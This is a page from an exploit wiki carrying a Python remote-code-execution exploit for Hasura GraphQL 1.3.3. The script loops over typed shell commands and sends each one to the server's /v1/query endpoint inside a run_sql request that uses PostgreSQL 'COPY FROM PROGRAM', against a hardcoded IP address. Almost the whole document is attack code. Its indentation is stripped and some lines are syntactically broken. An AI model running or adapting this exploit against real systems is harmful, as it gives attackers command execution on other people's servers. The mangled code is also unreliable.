pwnwiki.com
,
EXP
# Exploit Title: Hasura GraphQL 1.3.3 - Remote Code Execution
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Exploit Author: Dolev Farhi
# Date: 4/23/2021
# Tested on: Ubuntu
import requests
import sys
HASURA_SCHEME = 'http'
HASURA_HOST = '192.34.57.144'
HASURA_PORT = 80
print('Start typing shell commands...')
while True:
cmd = input('cmd $> ')
data = { "type":"bulk",
"args":
{
"type":"run_sql",
"args":{
"sql":"SET LOCAL statement_timeout = 10000;","cascade":False,"read_only":False}
},
{
"type":"run_sql",
"args":{
"sql":"DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM '" + cmd + "';\nSELECT * FROM cmd_exec;","cascade":False,"read_only":False}
}
}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
if r.ok:
try:
for i in r.json()1'result':
print(''.join(i))
except:
print(r.json())
免费、自由、人人可编辑的漏洞库--PwnWiki.com
